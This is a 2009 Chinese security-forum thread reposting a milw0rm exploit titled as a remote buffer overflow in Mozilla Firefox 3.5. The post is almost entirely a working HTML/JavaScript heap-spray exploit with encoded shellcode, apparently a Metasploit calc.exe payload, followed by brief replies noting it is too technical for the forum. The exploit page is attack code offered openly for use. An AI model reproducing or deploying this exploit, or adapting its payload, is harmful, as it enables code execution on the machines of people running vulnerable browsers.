设为首页收藏本站

巨盾安全论坛

 找回密码
 欢迎注册

QQ登录

只需一步,快速开始

查看: 1612|回复: 5

Mozilla Firefox 3.5 Remote Buffer Overflow Exploit (untested crash) [复制链接]

Rank: 7Rank: 7Rank: 7

盾币
364
盾分
0
在线时间
743 小时
最后登录
2012-5-9
主题
14
精华
1
帖子
313
发表于 2009-7-14 22:21:30 |显示全部楼层
from milw0rm.com [2009-07-13]


  1. <html>
  2. <head>
  3. <title>Firefox 3.5 Vulnerability</title>
  4. Firefox 3.5 Heap Spray Vulnerabilty
  5. </br>
  6. Author: SBerry aka Simon Berry-Byrne
  7. </br>
  8. Thanks to HD Moore for the insight and Metasploit for the payload
  9. <div id="content">
  10. <p>
  11. <FONT>
  12. </FONT>
  13. </p>
  14. <p>
  15. <FONT>Loremipsumdoloregkuw</FONT></p>
  16. <p>
  17. <FONT>Loremipsumdoloregkuwiert</FONT>
  18. </p>
  19. <p>
  20. <FONT>Loremikdkw  </FONT>
  21. </p>
  22. </div>
  23. <script language=JavaScript>

  24. /* Calc.exe */
  25. var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
  26.                        "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
  27.                        "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
  28.                        "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
  29.                        "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
  30.                        "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
  31.                        "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
  32.                        "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
  33.                        "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
  34.                        "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
  35.                        "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
  36.                        "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
  37.                        "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
  38.                        "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
  39.                        "%u652E%u6578%u9000");
  40. /* Heap Spray Code */
  41. oneblock = unescape("%u0c0c%u0c0c");
  42. var fullblock = oneblock;
  43. while (fullblock.length<0x60000)
  44. {
  45.     fullblock += fullblock;
  46. }
  47. sprayContainer = new Array();
  48. for (i=0; i<600; i++)
  49. {
  50.     sprayContainer[i] = fullblock + shellcode;
  51. }
  52. var searchArray = new Array()

  53. function escapeData(data)
  54. {
  55. var i;
  56. var c;
  57. var escData='';
  58. for(i=0;i<data.length;i++)
  59.   {
  60.    c=data.charAt(i);
  61.    if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
  62.    escData+=c;
  63.   }
  64. return escData;
  65. }

  66. function DataTranslator(){
  67.     searchArray = new Array();
  68.     searchArray[0] = new Array();
  69.     searchArray[0]["str"] = "blah";
  70.     var newElement = document.getElementById("content")
  71.     if (document.getElementsByTagName) {
  72.         var i=0;
  73.         pTags = newElement.getElementsByTagName("p")
  74.         if (pTags.length > 0)
  75.         while (i<pTags.length)
  76.         {
  77.             oTags = pTags[i].getElementsByTagName("font")
  78.             searchArray[i+1] = new Array()
  79.             if (oTags[0])
  80.             {
  81.                 searchArray[i+1]["str"] = oTags[0].innerHTML;
  82.             }
  83.             i++
  84.         }
  85.     }
  86. }

  87. function GenerateHTML()
  88. {
  89.     var html = "";
  90.     for (i=1;i<searchArray.length;i++)
  91.     {
  92.         html += escapeData(searchArray[i]["str"])
  93.     }
  94. }
  95. DataTranslator();
  96. GenerateHTML()
  97. </script>
  98. </body>
  99. </html>
  100. <html><body></body></html>
复制代码

Rank: 8Rank: 8Rank: 8Rank: 8

盾币
1691
盾分
0
在线时间
3400 小时
最后登录
2012-5-19
主题
53
精华
5
帖子
1464

优秀斑竹

发表于 2009-7-14 22:24:52 |显示全部楼层
本帖最后由 Sagittarius 于 2009-7-14 22:26 编辑

这个不适合放这边。。不想做技术论坛。。
西瓜以后放些浅些,易懂的。便于平民化。的。。
勤勤恳恳做事,安安静静做人

Rank: 7Rank: 7Rank: 7

盾币
364
盾分
0
在线时间
743 小时
最后登录
2012-5-9
主题
14
精华
1
帖子
313
发表于 2009-7-14 22:28:07 |显示全部楼层
这个不适合放这边。。不想做技术论坛。。
西瓜以后放些浅些,易懂的。便于平民化。的。。
Sagittarius 发表于 2009-7-14 22:24


这世道IE才出了0day,Firefox也来凑热闹

Rank: 1

盾币
520
盾分
0
在线时间
436 小时
最后登录
2010-8-24
主题
23
精华
0
帖子
483
发表于 2009-12-5 02:25:13 |显示全部楼层
杀木马用巨盾,用了都说好!
头像被屏蔽

禁止发言

盾币
4
盾分
0
在线时间
0 小时
最后登录
2009-12-23
主题
0
精华
0
帖子
4
发表于 2009-12-5 15:16:38 |显示全部楼层

人言可畏啊!

提示: 作者被禁止或删除 内容自动屏蔽

Rank: 1

盾币
343
盾分
0
在线时间
237 小时
最后登录
2011-6-24
主题
101
精华
0
帖子
201
发表于 2009-12-5 17:22:36 |显示全部楼层
很强,但是看不懂。
验证问答 换一个 验证码 换一个

防盗号用巨盾!巨盾是一款针对木马查杀、在线娱乐安全设计的产品,最受网游用户和上网冲浪用户的欢迎。永久免费,使用方便,查杀迅速,小巧轻便。

Archiver|巨盾安全实验室 [防盗号用巨盾,安全玩游戏] ( 沪ICP备09050605号 )  

GMT+8, 2012-5-22 07:04 , Processed in 0.057391 second(s), 15 queries .

Powered by Discuz! X2

© 2001-2011 Comsenz Inc.

回顶部